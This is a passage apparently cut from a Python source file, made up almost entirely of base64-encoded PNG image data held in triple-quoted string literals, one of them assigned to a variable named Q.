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"""
Q="""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